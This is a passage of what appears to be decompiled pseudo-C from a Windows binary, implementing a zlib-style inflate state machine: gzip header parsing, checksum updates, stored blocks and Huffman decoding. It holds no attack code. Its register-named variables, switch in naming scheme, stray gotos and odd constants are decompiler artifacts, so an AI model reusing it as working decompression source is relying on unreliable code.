																 *(__esp + 0x1c) = __bl;
																__ecx = __ebx;
																__edx = __ebx;
																__ecx = __ebx >> 8;
																__edx = __ebx >> 0x10;
																__ebx = __ebx >> 0x18;
																__eax = __esp + 0x20;
																 *(__esp + 0x21) = __cl;
																 *((char*)(__esp + 0x22)) = __dl;
																 *(__esp + 0x23) = __bl;
																__ecx =  *(__edi + 0x18);
																__eax = E00403080( *(__edi + 0x18), __esp + 0x20, 4);
																__edx =  *(__esp + 0x1c);
																 *(__edi + 0x18) = __eax;
															}
															__ebx = 0;
															__esi = 0;
															 *__edi = 3;
															goto L43;
														} else {
															L33:
															L34:
															while(__edx != 0) {
																__eax =  *__ebp & 0x000000ff;
																__ecx = __esi;
																__eax = ( *__ebp & 0x000000ff) << __cl;
																__edx = __edx - 1;
																__esi = __esi + 8;
																__ebp =  &(__ebp[1]);
																__ebx = __ebx + __eax;
																 *(__esp + 0x10) = __edx;
																if(__esi < 0x20) {
																	continue;
																} else {
																	goto L36;
																}
																goto L321;
															}
															goto L303;
														}
														goto L321;
													case 3:
														L41:
														if(__esi >= 0x10) {
															L45:
															__eax =  *(__edi + 0x20);
															if(__eax != 0) {
																__ebx = __ebx & 0x000000ff;
																 *(__eax + 8) = __ebx & 0x000000ff;
																__ecx =  *(__edi + 0x20);
																__eax = __ebx;
																__eax = __ebx >> 8;
																 *( *(__edi + 0x20) + 0xc) = __eax;
															}
															if(( *(__edi + 0x10) & 0x00000200) != 0) {
																 *(__esp + 0x1c) = __bl;
																__ebx = __ebx >> 8;
																__edx = __esp + 0x20;
																 *(__esp + 0x21) = __bl;
																__eax =  *(__edi + 0x18);
																__eax = E00403080( *(__edi + 0x18), __esp + 0x20, 2);
																__edx =  *(__esp + 0x1c);
																 *(__edi + 0x18) = __eax;
															}
															__ebx = 0;
															__esi = 0;
															 *__edi = 4;
															goto L50;
														} else {
															L42:
															L43:
															while(__edx != 0) {
																__eax =  *__ebp & 0x000000ff;
																__ecx = __esi;
																__eax = ( *__ebp & 0x000000ff) << __cl;
																__edx = __edx - 1;
																__esi = __esi + 8;
																__ebp =  &(__ebp[1]);
																__ebx = __ebx + __eax;
																 *(__esp + 0x10) = __edx;
																if(__esi < 0x10) {
																	continue;
																} else {
																	goto L45;
																}
																goto L321;
															}
															goto L303;
														}
														goto L321;
													case 4:
														L50:
														if(( *(__edi + 0x10) & 0x00000400) == 0) {
															L59:
															__eax =  *(__edi + 0x20);
															if(__eax != 0) {
																 *(__eax + 0x10) = 0;
															}
															goto L61;
														} else {
															L51:
															if(__esi >= 0x10) {
																L54:
																__eax =  *(__edi + 0x20);
																 *(__edi + 0x40) = __ebx;
																if(__eax != 0) {
																	 *(__eax + 0x14) = __ebx;
																}
																if(( *(__edi + 0x10) & 0x00000200) != 0) {
																	 *(__esp + 0x1c) = __bl;
																	__ebx = __ebx >> 8;
																	__ecx = __esp + 0x20;
																	 *(__esp + 0x21) = __bl;
																	__edx =  *(__edi + 0x18);
																	__eax = E00403080( *(__edi + 0x18), __esp + 0x20, 2);
																	__edx =  *(__esp + 0x1c);
																	 *(__edi + 0x18) = __eax;
																}
																__ebx = 0;
																__esi = 0;
																L61:
																 *__edi = 5;
																goto L62;
															} else {
																L52:
																while(__edx != 0) {
																	__eax =  *__ebp & 0x000000ff;
																	__ecx = __esi;
																	__eax = ( *__ebp & 0x000000ff) << __cl;
																	__edx = __edx - 1;
																	__esi = __esi + 8;
																	__ebp =  &(__ebp[1]);
																	__ebx = __ebx + __eax;
																	 *(__esp + 0x10) = __edx;
																	if(__esi < 0x10) {
																		continue;
																	} else {
																		goto L54;
																	}
																	goto L321;
																}
																goto L303;
															}
														}
														goto L321;
													case 5:
														L62:
														if(( *(__edi + 0x10) & 0x00000400) == 0) {
															L75:
															 *(__edi + 0x40) = 0;
															 *__edi = 6;
															goto L76;
														} else {
															L63:
															__eax =  *(__edi + 0x40);
															 *(__esp + 0x14) = __eax;
															if(__eax > __edx) {
																__eax = __edx;
																 *(__esp + 0x14) = __edx;
															}
															if(__eax != 0) {
																__ecx =  *(__edi + 0x20);
																if(__ecx != 0) {
																	__ecx =  *(__ecx + 0x10);
																	 *(__esp + 0x34) = __ecx;
																	if(__ecx != 0) {
																		 *(__edi + 0x20) =  *( *(__edi + 0x20) + 0x14);
																		__ecx =  *( *(__edi + 0x20) + 0x14) -  *(__edi + 0x40);
																		__edx =  *(__edi + 0x20);
																		__edx =  *( *(__edi + 0x20) + 0x18);
																		 *(__esp + 0x20) = __ecx;
																		if(__ecx > __edx) {
																			__eax = __edx;
																		}
																		__edx =  *(__esp + 0x34);
																		__eax =  *(__esp + 0x24);
																		__edx =  *(__esp + 0x34) +  *(__esp + 0x24);
																		__eax = E0040B350(__ebx, __edi, __esi,  *(__esp + 0x34) +  *(__esp + 0x24), __ebp,  *(__esp + 0x24));
																		__eax =  *(__esp + 0x20);
																		__edx =  *(__esp + 0x1c);
																	}
																}
																if(( *(__edi + 0x10) & 0x00000200) != 0) {
																	__ecx =  *(__esp + 0x14);
																	__edx =  *(__edi + 0x18);
																	__eax = E00403080( *(__edi + 0x18), __ebp,  *(__esp + 0x14));
																	__edx =  *(__esp + 0x1c);
																	 *(__edi + 0x18) = __eax;
																	__eax =  *(__esp + 0x20);
																}
																__edx = __edx - __eax;
																__ebp =  &(__ebp[__eax]);
																 *(__edi + 0x40) =  *(__edi + 0x40) - __eax;
																 *(__esp + 0x10) = __edx;
															}
															if( *(__edi + 0x40) != 0) {
																goto L303;
															} else {
																goto L75;
															}
														}
														goto L321;
													case 6:
														L76:
														if(( *(__edi + 0x10) & 0x00000800) == 0) {
															L89:
															__eax =  *(__edi + 0x20);
															if(__eax != 0) {
																 *(__eax + 0x1c) = 0;
															}
															goto L91;
														} else {
															L77:
															if(__edx == 0) {
																goto L303;
															} else {
																L78:
																__eax = 0;
																while(1) {
																	L79:
																	__ecx = __ebp[__eax] & 0x000000ff;
																	 *(__esp + 0x14) = __eax;
																	__eax =  *(__edi + 0x20);
																	 *(__esp + 0x20) = __ecx;
																	if(__eax != 0) {
																		__ecx =  *(__eax + 0x1c);
																		 *(__esp + 0x34) = __ecx;
																		if(__ecx != 0) {
																			__ecx =  *(__edi + 0x40);
																			if(__ecx <  *((intOrPtr*)(__eax + 0x20))) {
																				__edx =  *(__esp + 0x34);
																				 *((char*)( *(__esp + 0x34) + __ecx)) =  *(__esp + 0x20);
																				 *(__edi + 0x40) =  *(__edi + 0x40) + 1;
																				__edx =  *(__esp + 0x10);
																			}
																		}
																	}
																	if( *(__esp + 0x20) == 0) {
																		break;
																	}
																	L84:
																	__eax =  *(__esp + 0x14);
																	if(__eax < __edx) {
																		continue;
																	}
																	break;
																}
																L85:
																if(( *(__edi + 0x10) & 0x00000200) != 0) {
																	__ecx =  *(__esp + 0x14);
																	__edx =  *(__edi + 0x18);
																	__eax = E00403080( *(__edi + 0x18), __ebp,  *(__esp + 0x14));
																	__edx =  *(__esp + 0x1c);
																	 *(__edi + 0x18) = __eax;
																}
																__eax =  *(__esp + 0x14);
																__edx = __edx - __eax;
																__ebp =  &(__ebp[__eax]);
																 *(__esp + 0x10) = __edx;
																if( *(__esp + 0x20) != 0) {
																	goto L303;
																} else {
																	L88:
																	L91:
																	 *(__edi + 0x40) = 0;
																	 *__edi = 7;
																	goto L92;
																}
															}
														}
														goto L321;
													case 7:
														L92:
														if(( *(__edi + 0x10) & 0x00001000) == 0) {
															L105:
															__eax =  *(__edi + 0x20);
															if(__eax != 0) {
																 *(__eax + 0x24) = 0;
															}
															goto L107;
														} else {
															L93:
															if(__edx == 0) {
																goto L303;
															} else {
																L94:
																__eax = 0;
																while(1) {
																	L95:
																	__ecx = __ebp[__eax] & 0x000000ff;
																	 *(__esp + 0x14) = __eax;
																	__eax =  *(__edi + 0x20);
																	 *(__esp + 0x20) = __ecx;
																	if(__eax != 0) {
																		__ecx =  *(__eax + 0x24);
																		 *(__esp + 0x34) = __ecx;
																		if(__ecx != 0) {
																			__ecx =  *(__edi + 0x40);
																			if(__ecx <  *((intOrPtr*)(__eax + 0x28))) {
																				__edx =  *(__esp + 0x34);
																				 *((char*)( *(__esp + 0x34) + __ecx)) =  *(__esp + 0x20);
																				 *(__edi + 0x40) =  *(__edi + 0x40) + 1;
																				__edx =  *(__esp + 0x10);
																			}
																		}
																	}
																	if( *(__esp + 0x20) == 0) {
																		break;
																	}
																	L100:
																	__eax =  *(__esp + 0x14);
																	if(__eax < __edx) {
																		continue;
																	}
																	break;
																}
																L101:
																if(( *(__edi + 0x10) & 0x00000200) != 0) {
																	__ecx =  *(__esp + 0x14);
																	__edx =  *(__edi + 0x18);
																	__eax = E00403080( *(__edi + 0x18), __ebp,  *(__esp + 0x14));
																	__edx =  *(__esp + 0x1c);
																	 *(__edi + 0x18) = __eax;
																}
																__eax =  *(__esp + 0x14);
																__edx = __edx - __eax;
																__ebp =  &(__ebp[__eax]);
																 *(__esp + 0x10) = __edx;
																if( *(__esp + 0x20) != 0) {
																	goto L303;
																} else {
																	L104:
																	L107:
																	 *__edi = 8;
																	goto L108;
																}
															}
														}
														goto L321;
													case 8:
														L108:
														if(( *(__edi + 0x10) & 0x00000200) == 0) {
															L115:
															__eax =  *(__edi + 0x20);
															if(__eax != 0) {
																 *(__edi + 0x10) =  *(__edi + 0x10) >> 9;
																__ecx =  *(__edi + 0x10) >> 0x00000009 & 0x00000001;
																 *(__eax + 0x2c) =  *(__edi + 0x10) >> 0x00000009 & 0x00000001;
																__edx =  *(__edi + 0x20);
																 *( *(__edi + 0x20) + 0x30) = 1;
															}
															__eax = E00403080(0, 0, 0);
															__ecx =  *(__esp + 0x4c);
															__edx =  *(__esp + 0x1c);
															 *(__edi + 0x18) = __eax;
															 *( *(__esp + 0x4c) + 0x30) = __eax;
															 *__edi = 0xb;
															goto L295;
														} else {
															L109:
															if(__esi >= 0x10) {
																L112:
																__ecx =  *(__edi + 0x18) & 0x0000ffff;
																if(__ebx == ( *(__edi + 0x18) & 0x0000ffff)) {
																	L114:
																	__ebx = 0;
																	__esi = 0;
																	goto L115;
																} else {
																	L113:
																	__eax =  *(__esp + 0x40);
																	 *(__eax + 0x18) = 0x41d338;
																	goto L294;
																}
																goto L295;
															} else {
																L110:
																while(__edx != 0) {
																	__eax =  *__ebp & 0x000000ff;
																	__ecx = __esi;
																	__eax = ( *__ebp & 0x000000ff) << __cl;
																	__edx = __edx - 1;
																	__esi = __esi + 8;
																	__ebp =  &(__ebp[1]);
																	__ebx = __ebx + __eax;
																	 *(__esp + 0x10) = __edx;
																	if(__esi < 0x10) {
																		continue;
																	} else {
																		goto L112;
																	}
																	goto L321;
																}
																goto L303;
															}
														}
														goto L321;
													case 9:
														L118:
														if(__esi >= 0x20) {
															L122:
															__ebx = __ebx & 0x0000ff00;
															__ebx = __ebx << 0x10;
															__ecx = (__ebx & 0x0000ff00) + (__ebx << 0x10);
															__ebx = __ebx >> 8;
															__ecx = (__ebx & 0x0000ff00) + (__ebx << 0x10) << 8;
															__eax = __ebx >> 0x00000008 & 0x0000ff00;
															__ecx = ((__ebx & 0x0000ff00) + (__ebx << 0x10) << 8) + (__ebx >> 0x00000008 & 0x0000ff00);
															__eax = __ecx + __ebx;
															__ecx =  *(__esp + 0x40);
															 *(__edi + 0x18) = __eax;
															 *( *(__esp + 0x40) + 0x30) = __eax;
															__ebx = 0;
															__esi = 0;
															 *__edi = 0xa;
															goto L123;
														} else {
															L119:
															L120:
															while(__edx != 0) {
																__eax =  *__ebp & 0x000000ff;
																__ecx = __esi;
																__eax = ( *__ebp & 0x000000ff) << __cl;
																__edx = __edx - 1;
																__esi = __esi + 8;
																__ebp =  &(__ebp[1]);
																__ebx = __ebx + __eax;
																 *(__esp + 0x10) = __edx;
																if(__esi < 0x20) {
																	continue;
																} else {
																	goto L122;
																}
																goto L321;
															}
															goto L303;
														}
														goto L321;
													case 0xa:
														L123:
														if( *((intOrPtr*)(__edi + 0xc)) == 0) {
															L298:
															__eax =  *(__esp + 0x40);
															__ecx =  *(__esp + 0x24);
															 *(__eax + 0xc) =  *(__esp + 0x24);
															__ecx =  *(__esp + 0x18);
															 *__eax = __ebp;
															 *(__eax + 0x10) =  *(__esp + 0x18);
															 *(__eax + 4) = __edx;
															 *(__edi + 0x3c) = __esi;
															_pop(__esi);
															_pop(__ebp);
															 *(__edi + 0x38) = __ebx;
															_pop(__ebx);
															__eax = 2;
															_pop(__edi);
															__esp = __esp + 0x2c;
															return 2;
														} else {
															L124:
															_push(0);
															_push(0);
															_push(0);
															__eax = E004024A0();
															__edx =  *(__esp + 0x4c);
															 *(__edi + 0x18) = __eax;
															 *( *(__esp + 0x4c) + 0x30) = __eax;
															__edx =  *(__esp + 0x1c);
															__esp = __esp + 0xc;
															 *__edi = 0xb;
															goto L125;
														}
														goto L321;
													case 0xb:
														L125:
														if( *((intOrPtr*)(__esp + 0x44)) == 5) {
															goto L303;
														} else {
															goto L126;
														}
														goto L321;
													case 0xc:
														L126:
														if( *(__edi + 4) == 0) {
															L128:
															if(__esi >= 3) {
																L132:
																__ecx = __ebx;
																__ebx = __ebx >> 1;
																__eax = __ebx;
																__ecx = __ecx & 0x00000001;
																__eax = __ebx & 0x00000003;
																__esi = __esi - 1;
																 *(__edi + 4) = __ecx;
																if(__eax > 3) {
																	L138:
																	__ebx = __ebx >> 2;
																	__esi = __esi - 2;
																} else {
																	L133:
																	switch( *((intOrPtr*)(__eax * 4 +  &M00408838))) {
																		case 0:
																			L134:
																			__ebx = __ebx >> 2;
																			 *__edi = 0xd;
																			__esi = __esi - 2;
																			goto L295;
																		case 1:
																			L135:
																			__eax = __edi;
																			__eax = E00407290(__edi);
																			__ebx = __ebx >> 2;
																			 *__edi = 0x12;
																			__esi = __esi - 2;
																			goto L295;
																		case 2:
																			L136:
																			__ebx = __ebx >> 2;
																			 *__edi = 0xf;
																			__esi = __esi - 2;
																			goto L295;
																		case 3:
																			L137:
																			__eax =  *(__esp + 0x40);
																			 *(__eax + 0x18) = 0x41d338;
																			 *__edi = 0x1b;
																			goto L138;
																	}
																}
																goto L295;
															} else {
																L129:
																L130:
																while(__edx != 0) {
																	__eax =  *__ebp & 0x000000ff;
																	__ecx = __esi;
																	__eax = ( *__ebp & 0x000000ff) << __cl;
																	__edx = __edx - 1;
																	__esi = __esi + 8;
																	__ebp =  &(__ebp[1]);
																	__ebx = __ebx + __eax;
																	 *(__esp + 0x10) = __edx;
																	if(__esi < 3) {
																		continue;
																	} else {
																		goto L132;
																	}
																	goto L321;
																}
																goto L303;
															}
														} else {
															L127:
															__esi = __esi & 0x00000007;
															__ebx = __ebx >> __cl;
															__esi = __esi - (__esi & 0x00000007);
															 *__edi = 0x18;
															goto L295;
														}
														goto L321;
													case 0xd:
														L139:
														__esi = __esi & 0x00000007;
														__esi = __esi - (__esi & 0x00000007);
														__ebx = __ebx >> __cl;
														if(__esi >= 0x20) {
															L142:
															__ecx = __ebx;
															__eax = __ebx;
															__ecx =  !__ebx;
															__eax = __ebx & 0x0000ffff;
															__ecx =  !__ebx >> 0x10;
															if(__eax ==  !__ebx >> 0x10) {
																L144:
																__ebx = 0;
																 *(__edi + 0x40) = __eax;
																__esi = 0;
																 *__edi = 0xe;
																goto L145;
															} else {
																L143:
																__eax =  *(__esp + 0x40);
																 *(__eax + 0x18) = 0x41d338;
																goto L294;
															}
														} else {
															L140:
															while(__edx != 0) {
																__eax =  *__ebp & 0x000000ff;
																__ecx = __esi;
																__eax = ( *__ebp & 0x000000ff) << __cl;
																__edx = __edx - 1;
																__esi = __esi + 8;
																__ebp =  &(__ebp[1]);
																__ebx = __ebx + __eax;
																 *(__esp + 0x10) = __edx;
																if(__esi < 0x20) {
																	continue;
																} else {
																	goto L142;
																}
																goto L321;
															}
															goto L303;
														}
														goto L321;
													case 0xe:
														L145:
														__eax =  *(__edi + 0x40);
														 *(__esp + 0x14) = __eax;
														if(__eax == 0) {
															goto L224;
														} else {
															L146:
															if(__eax > __edx) {
																__eax = __edx;
																 *(__esp + 0x14) = __edx;
															}
															__ecx =  *(__esp + 0x18);
															if(__eax > __ecx) {
																__eax = __ecx;
																 *(__esp + 0x14) = __eax;
															}
															if(__eax == 0) {
																goto L303;
															} else {
																L151:
																__ecx =  *(__esp + 0x14);
																__edx =  *(__esp + 0x24);
																__eax = E0040B350(__ebx, __edi, __esi,  *(__esp + 0x24), __ebp,  *(__esp + 0x14));
																__eax =  *(__esp + 0x20);
																 *(__esp + 0x1c) =  *(__esp + 0x1c) - __eax;
																 *(__esp + 0x24) =  *(__esp + 0x24) - __eax;
																 *(__esp + 0x30) =  *(__esp + 0x30) + __eax;
																__edx =  *(__esp + 0x1c);
																__ebp =  &(__ebp[__eax]);
																 *(__edi + 0x40) =  *(__edi + 0x40) - __eax;
																goto L295;
															}
														}
														goto L321;
													case 0xf:
														goto L0;
													case 0x10:
														goto L157;
													case 0x11:
														goto L168;
													case 0x12:
														L207:
														if(_t998 < 6 ||  *(_t1036 + 0x18) < 0x102) {
															L210:
															_t671 =  *(_t1018[0x13] + ((0x00000001 << _t1018[0x15]) - 0x00000001 & _t814) * 4);
															 *(_t1036 + 0x14) = _t671;
															if((_t671 >> 0x00000008 & 0x000000ff) <= _t1023) {
																L214:
																if(_t671 == 0 || (_t671 & 0x000000f0) != 0) {
																	L221:
																	_t864 = _t671 >> 0x00000008 & 0x000000ff;
																	_t814 = _t814 >> _t864;
																	_t1023 = _t1023 - _t864;
																	 *(_t1036 + 0x20) = _t864;
																	_t1018[0x10] = _t671 >> 0x10;
																	if(_t671 != 0) {
																		L223:
																		if((_t671 & 0x00000020) == 0) {
																			L225:
																			if((_t671 & 0x00000040) == 0) {
																				L227:
																				_t1018[0x12] = _t671 & 0xf;
																				 *_t1018 = 0x13;
																				goto L228;
																			} else {
																				L226:
																				( *(_t1036 + 0x40))[6] = 0x41d338;
																				goto L294;
																			}
																		} else {
																			L224:
																			 *_t1018 = 0xb;
																			goto L295;
																		}
																	} else {
																		L222:
																		 *_t1018 = 0x17;
																		goto L295;
																	}
																} else {
																	L216:
																	_t928 = _t671 >> 8;
																	 *(_t1036 + 0x34) = _t928;
																	 *(_t1036 + 0x20) = _t928 & 0x000000ff;
																	 *(_t1036 + 0x2c) = _t671;
																	_t738 =  *(_t1018[0x13] + ((((0x00000001 << (_t671 & 0x000000ff) +  *(_t1036 + 0x20)) - 0x00000001 & _t814) >>  *(_t1036 + 0x20)) + ( *(_t1036 + 0x14) >> 0x10)) * 4);
																	 *(_t1036 + 0x14) = _t738;
																	if((_t738 >> 0x00000008 & 0x000000ff) + ( *(_t1036 + 0x34) & 0x000000ff) <= _t1023) {
																		L220:
																		_t937 =  *(_t1036 + 0x2d) & 0x000000ff;
																		_t671 =  *(_t1036 + 0x14);
																		_t814 = _t814 >> _t937;
																		_t1023 = _t1023 - _t937;
																		goto L221;
																	} else {
																		L217:
																		L218:
																		while(_t998 != 0) {
																			_t743 = ( *_t1029 & 0x000000ff) << _t1023;
																			_t939 =  *(_t1036 + 0x2c);
																			_t998 = _t998 - 1;
																			_t1023 = _t1023 + 8;
																			_t814 = _t814 + _t743;
																			_t744 = _t939 & 0x000000ff;
																			 *(_t1036 + 0x20) = _t744;
																			_t1029 =  &(_t1029[1]);
																			 *(_t1036 + 0x10) = _t998;
																			 *(_t1036 + 0x14) = 1;
																			if(( *(_t1018[0x13] + ((((0x00000001 << (_t939 & 0x000000ff) + _t744) - 0x00000001 & _t814) >>  *(_t1036 + 0x20)) + ( *(_t1036 + 0x2e) & 0x0000ffff)) * 4) >> 0x00000008 & 0x000000ff) +  *(_t1036 + 0x20) > _t1023) {
																				continue;
																			} else {
																				goto L220;
																			}
																			goto L321;
																		}
																		goto L303;
																	}
																}
															} else {
																L211:
																L212:
																while(_t998 != 0) {
																	_t756 = ( *_t1029 & 0x000000ff) << _t1023;
																	_t998 = _t998 - 1;
																	_t1023 = _t1023 + 8;
																	_t814 = _t814 + _t756;
																	_t1029 =  &(_t1029[1]);
																	 *(_t1036 + 0x10) = _t998;
																	_t671 =  *(_t1018[0x13] + ((0x00000001 << _t1018[0x15]) - 0x00000001 & _t814) * 4);
																	 *(_t1036 + 0x14) = 1;
																	if(0xad > _t1023) {
																		continue;
																	} else {
																		goto L214;
																	}
																	goto L321;
																}
																goto L303;
															}
														} else {
															L209:
															_t761 =  *(_t1036 + 0x40);
															_t761[4] =  *(_t1036 + 0x18);
															_t761[3] =  *(_t1036 + 0x24);
															_push( *(_t1036 + 0x28));
															 *_t761 = _t1029;
															_t761[1] =  *(_t1036 + 0x10);
															_push(_t761);
															_t1018[0xe] = _t814;
															_t1018[0xf] = _t1023;
															E00406CA0();
															_t763 =  *(_t1036 + 0x48);
															_t1029 =  *_t763;
															_t764 = _t763[1];
															_t814 = _t1018[0xe];
															_t1023 = _t1018[0xf];
															 *(_t1036 + 0x20) = _t763[4];
															_t1036 = _t1036 + 8;
															 *(_t1036 + 0x24) = _t763[3];
															 *(_t1036 + 0x10) = _t764;
															_t998 = _t764;
															goto L295;
														}
														goto L321;
													case 0x13:
														L228:
														_t672 = _t1018[0x12];
														if(_t672 == 0) {
															L234:
															 *_t1018 = 0x14;
															goto L235;
														} else {
															L229:
															if(_t1023 >= _t672) {
																L233:
																_t925 = _t1018[0x12];
																_t1018[0x10] = _t1018[0x10] + ((0x00000001 << _t925) - 0x00000001 & _t814);
																_t814 = _t814 >> _t925;
																_t1023 = _t1023 - _t925;
																goto L234;
															} else {
																L230:
																L231:
																while(_t998 != 0) {
																	_t729 = ( *_t1029 & 0x000000ff) << _t1023;
																	_t998 = _t998 - 1;
																	_t1023 = _t1023 + 8;
																	_t1029 =  &(_t1029[1]);
																	_t814 = _t814 + _t729;
																	 *(_t1036 + 0x10) = _t998;
																	if(_t1023 < _t1018[0x12]) {
																		continue;
																	} else {
																		goto L233;
																	}
																	goto L321;
																}
																goto L303;
															}
														}
														goto L321;
													case 0x14:
														L235:
														_t678 =  *((intOrPtr*)(_t1018[0x14] + ((0x00000001 << _t1018[0x16]) - 0x00000001 & _t814) * 4));
														 *(_t1036 + 0x14) = _t678;
														if((_t678 >> 0x00000008 & 0x000000ff) <= _t1023) {
															L239:
															if((_t678 & 0x000000f0) != 0) {
																L244:
																_t876 = _t678 >> 0x00000008 & 0x000000ff;
																_t814 = _t814 >> _t876;
																_t1023 = _t1023 - _t876;
																 *(_t1036 + 0x20) = _t876;
																if((_t678 & 0x00000040) == 0) {
																	L246:
																	_t1018[0x11] = _t678 >> 0x10;
																	_t1018[0x12] = _t678 & 0xf;
																	 *_t1018 = 0x15;
																	goto L247;
																} else {
																	L245:
																	( *(_t1036 + 0x40))[6] = 0x41d338;
																	goto L294;
																}
															} else {
																L240:
																_t902 = _t678 >> 8;
																 *(_t1036 + 0x34) = _t902;
																 *(_t1036 + 0x20) = _t902 & 0x000000ff;
																 *(_t1036 + 0x2c) = _t678;
																_t701 =  *(_t1018[0x14] + ((((0x00000001 << (_t678 & 0x000000ff) +  *(_t1036 + 0x20)) - 0x00000001 & _t814) >>  *(_t1036 + 0x20)) + ( *(_t1036 + 0x14) >> 0x10)) * 4);
																 *(_t1036 + 0x14) = _t701;
																if((_t701 >> 0x00000008 & 0x000000ff) + ( *(_t1036 + 0x34) & 0x000000ff) <= _t1023) {
																	L243:
																	_t911 =  *(_t1036 + 0x2d) & 0x000000ff;
																	_t678 =  *(_t1036 + 0x14);
																	_t814 = _t814 >> _t911;
																	_t1023 = _t1023 - _t911;
																	goto L244;
																} else {
																	L241:
																	while(_t998 != 0) {
																		_t706 = ( *_t1029 & 0x000000ff) << _t1023;
																		_t913 =  *(_t1036 + 0x2c);
																		_t998 = _t998 - 1;
																		_t1023 = _t1023 + 8;
																		_t814 = _t814 + _t706;
																		_t707 = _t913 & 0x000000ff;
																		 *(_t1036 + 0x20) = _t707;
																		_t1029 =  &(_t1029[1]);
																		 *(_t1036 + 0x10) = _t998;
																		 *(_t1036 + 0x14) = 1;
																		if(( *(_t1018[0x14] + ((((0x00000001 << (_t913 & 0x000000ff) + _t707) - 0x00000001 & _t814) >>  *(_t1036 + 0x20)) + ( *(_t1036 + 0x2e) & 0x0000ffff)) * 4) >> 0x00000008 & 0x000000ff) +  *(_t1036 + 0x20) > _t1023) {
																			continue;
																		} else {
																			goto L243;
																		}
																		goto L321;
																	}
																	goto L303;
																}
															}
														} else {
															L236:
															L237:
															while(_t998 != 0) {
																_t719 = ( *_t1029 & 0x000000ff) << _t1023;
																_t998 = _t998 - 1;
																_t1023 = _t1023 + 8;
																_t814 = _t814 + _t719;
																_t1029 =  &(_t1029[1]);
																 *(_t1036 + 0x10) = _t998;
																_t678 =  *(_t1018[0x14] + ((0x00000001 << _t1018[0x16]) - 0x00000001 & _t814) * 4);
																 *(_t1036 + 0x14) = 1;
																if(0xad > _t1023) {
																	continue;
																} else {
																	goto L239;
																}
																goto L321;
															}
															goto L303;
														}
														goto L321;
													case 0x15:
														L247:
														_t681 = _t1018[0x12];
														if(_t681 == 0) {
															L252:
															if(_t1018[0x11] <= _t1018[0xb] -  *(_t1036 + 0x18) +  *(_t1036 + 0x28)) {
																L254:
																 *_t1018 = 0x16;
																goto L255;
															} else {
																L253:
																( *(_t1036 + 0x40))[6] = 0x41d338;
																goto L294;
															}
														} else {
															L248:
															if(_t1023 >= _t681) {
																L251:
																_t899 = _t1018[0x12];
																_t1018[0x11] = _t1018[0x11] + ((0x00000001 << _t899) - 0x00000001 & _t814);
																_t814 = _t814 >> _t899;
																_t1023 = _t1023 - _t899;
																goto L252;
															} else {
																L249:
																while(_t998 != 0) {
																	_t692 = ( *_t1029 & 0x000000ff) << _t1023;
																	_t998 = _t998 - 1;
																	_t1023 = _t1023 + 8;
																	_t1029 =  &(_t1029[1]);
																	_t814 = _t814 + _t692;
																	 *(_t1036 + 0x10) = _t998;
																	if(_t1023 < _t1018[0x12]) {
																		continue;
																	} else {
																		goto L251;
																	}
																	goto L321;
																}
																goto L303;
															}
														}
														goto L321;
													case 0x16:
														L255:
														if( *(_t1036 + 0x18) == 0) {
															goto L303;
														} else {
															L256:
															_t883 =  *(_t1036 + 0x28) -  *(_t1036 + 0x18);
															_t682 = _t1018[0x11];
															if(_t682 <= _t883) {
																L262:
																_t683 = _t1018[0x10];
																 *(_t1036 + 0x2c) =  *(_t1036 + 0x24) - _t682;
																 *(_t1036 + 0x34) = _t683;
																goto L263;
															} else {
																L257:
																_t685 = _t682 - _t883;
																_t892 = _t1018[0xc];
																 *(_t1036 + 0x14) = _t685;
																if(_t685 <= _t892) {
																	_t895 = _t1018[0xd] - _t685 + _t1018[0xc];
																	_t683 =  *(_t1036 + 0x14);
																} else {
																	_t683 = _t685 - _t892;
																	 *(_t1036 + 0x14) = _t683;
																	_t895 = _t1018[0xd] + _t1018[0xa] - _t683;
																}
																 *(_t1036 + 0x2c) = _t895;
																_t896 = _t1018[0x10];
																 *(_t1036 + 0x34) = _t896;
																if(_t683 > _t896) {
																	L261:
																	_t683 = _t896;
																	L263:
																	 *(_t1036 + 0x14) = _t683;
																}
															}
															L264:
															_t886 =  *(_t1036 + 0x18);
															if(_t683 > _t886) {
																_t683 = _t886;
																 *(_t1036 + 0x14) = _t683;
															}
															 *(_t1036 + 0x18) = _t886 - _t683;
															_t684 =  *(_t1036 + 0x24);
															_t1018[0x10] =  *(_t1036 + 0x34) - _t683;
															do {
																L267:
																 *(_t1036 + 0x2c) =  *(_t1036 + 0x2c) + 1;
																 *_t684 =  *( *(_t1036 + 0x2c));
																_t684 =  &(_t684[1]);
																_t534 = _t1036 + 0x14;
																 *_t534 =  *(_t1036 + 0x14) - 1;
															} while ( *_t534 != 0);
															 *(_t1036 + 0x24) = _t684;
															if(_t1018[0x10] == 0) {
																 *_t1018 = 0x12;
															}
															goto L295;
														}
														goto L321;
													case 0x17:
														L270:
														if( *(__esp + 0x18) == 0) {
															goto L303;
														} else {
															L271:
															__eax =  *(__esp + 0x24);
															__cl =  *(__edi + 0x40);
															 *__eax = __cl;
															__eax = __eax + 1;
															 *(__esp + 0x18) =  *(__esp + 0x18) - 1;
															 *(__esp + 0x24) = __eax;
															 *__edi = 0x12;
															goto L295;
														}
														goto L321;
													case 0x18:
														L272:
														if( *((intOrPtr*)(__edi + 8)) == 0) {
															L286:
															 *__edi = 0x19;
															goto L287;
														} else {
															L273:
															if(__esi >= 0x20) {
																L276:
																__eax =  *(__esp + 0x28);
																__eax =  *(__esp + 0x28) -  *(__esp + 0x18);
																__ecx =  *(__esp + 0x40);
																 *((intOrPtr*)( *(__esp + 0x40) + 0x14)) =  *((intOrPtr*)( *(__esp + 0x40) + 0x14)) + __eax;
																 *((intOrPtr*)(__edi + 0x1c)) =  *((intOrPtr*)(__edi + 0x1c)) + __eax;
																 *(__esp + 0x28) = __eax;
																if(__eax != 0) {
																	__ecx =  *(__esp + 0x24);
																	__edx =  *(__edi + 0x18);
																	_push(__eax);
																	_push(__ecx);
																	_push( *(__edi + 0x18));
																	if( *(__edi + 0x10) == 0) {
																		__eax = E004024A0();
																	} else {
																		__eax = E00403080();
																	}
																	__ecx =  *(__esp + 0x4c);
																	__edx =  *(__esp + 0x1c);
																	 *(__edi + 0x18) = __eax;
																	__esp = __esp + 0xc;
																	 *(__ecx + 0x30) = __eax;
																}
																__eax =  *(__esp + 0x18);
																 *(__esp + 0x28) =  *(__esp + 0x18);
																__eax = __ebx;
																if( *(__edi + 0x10) == 0) {
																	__eax = __eax & 0x0000ff00;
																	__ebx = __ebx << 0x10;
																	__eax = __eax + (__ebx << 0x10);
																	__ebx = __ebx >> 8;
																	__ecx = __ebx >> 0x00000008 & 0x0000ff00;
																	__eax = __eax << 8;
